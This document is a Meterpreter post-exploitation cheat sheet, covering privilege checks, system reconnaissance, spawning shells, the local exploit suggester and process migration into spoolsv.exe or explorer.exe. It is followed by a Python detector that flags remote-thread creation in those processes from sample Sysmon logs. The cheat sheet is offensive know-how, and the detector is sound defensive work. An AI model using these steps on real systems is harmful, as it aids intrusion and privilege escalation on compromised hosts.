- ➡️ See if you are root and what your privileges are:

  ```
  meterpreter> getuid
  # e.g. on Windows: NT AUTHORITY\SYSTEM
  ```
- ➡️ Learn more about the system. On Windows, the build version tells you which CVEs may apply. The architecture helps too, as some scripts are less useful on some architectures.

  ```
  meterpreter> sysinfo
  Computer     : XXX-PC
  OS           : Windows X (... Build xxx...).
  Architecture : x64
  ```
- ➡️ Start a shell: `sh`/`bash` on Linux, `cmd` on Windows.

  ```
  meterpreter> shell # start a shell
  C:\WINDOWS\system32> # Windows cmd
  ```
- ➡️ Ask for suggested exploits. ⚠️ Before running them, migrate to a stable process with the highest privilege you can get.

  ```
  meterpreter> run post/multi/recon/local_exploit_suggester
  ```
- ➡️ Load a local file `commands.txt` containing meterpreter commands:

  ```
  meterpreter> resource commands.txt
  ```
- ➡️ Migrate to another process. This matters because some services and modules need us to be "in" a process that has the same architecture and the same permissions as our target. Usually, any process run by "NT AUTHORITY\SYSTEM"/root is fine, although you may have to try a few times.

  ```
  meterpreter> ps # list processes
  meterpreter> migrate process_pid # move to another process
  meterpreter> migrate -N process_name # same, by name
  meterpreter> # most used ones
  meterpreter> migrate -N spoolsv.exe # can be restarted if it dies, so a good choice
  meterpreter> migrate -N explorer.exe # needed for screenshots, etc.
  ```
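From the defender's side, the migration step above shows up as a thread being created in a process the attacker did not start. The following added example (not part of this cheat sheet) runs a simple check over constructed, simplified Sysmon Event ID 8 (CreateRemoteThread) lines and flags remote threads created in the two hosts named above by a source that is not on an assumed allow-list; the `key=value` layout, the sample lines and the `BENIGN_SOURCES` set are all assumptions to tune against a real baseline.

```python
import re
from pathlib import PureWindowsPath

# Processes the cheat sheet names as usual migration targets.
MIGRATION_HOSTS = {"spoolsv.exe", "explorer.exe"}

# Assumed allow-list of sources that legitimately create remote threads
# on this estate. Constructed placeholder: build yours from a baseline.
BENIGN_SOURCES = {"csrss.exe"}

# Constructed sample events in a simplified key=value layout using the
# real Sysmon Event ID 8 field names (SourceImage, TargetImage, ...).
SAMPLE_EVENTS = r"""
EventID=8 SourceProcessId=4412 SourceImage=C:\Users\bob\Downloads\update.exe TargetProcessId=1488 TargetImage=C:\Windows\System32\spoolsv.exe
EventID=8 SourceProcessId=612 SourceImage=C:\Windows\System32\csrss.exe TargetProcessId=3320 TargetImage=C:\Windows\explorer.exe
EventID=8 SourceProcessId=5120 SourceImage=C:\Windows\Temp\svc.exe TargetProcessId=3320 TargetImage=C:\Windows\explorer.exe
EventID=1 ProcessId=7001 Image=C:\Windows\System32\cmd.exe
"""

# Values may contain spaces and backslashes, so a value runs until the
# next " Key=" token or the end of the line.
FIELD_RE = re.compile(r"(\w+)=(.*?)(?=\s\w+=|$)")


def parse_event(line: str) -> dict:
    """Turn one 'Key=value Key=value' line into a dict."""
    return dict(FIELD_RE.findall(line))


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return PureWindowsPath(path).name.lower()


def find_suspicious_migrations(log_text: str) -> list[dict]:
    """Return Event ID 8 records whose target is a known migration host
    and whose source is not an allow-listed process."""
    hits = []
    for line in log_text.splitlines():
        ev = parse_event(line)
        if ev.get("EventID") != "8":
            continue  # only CreateRemoteThread events matter here
        src = basename(ev["SourceImage"])
        dst = basename(ev["TargetImage"])
        if dst in MIGRATION_HOSTS and src not in BENIGN_SOURCES:
            hits.append({"source": src, "target": dst, "raw": line})
    return hits


if __name__ == "__main__":
    for hit in find_suspicious_migrations(SAMPLE_EVENTS):
        print(f"remote thread: {hit['source']} -> {hit['target']}")
```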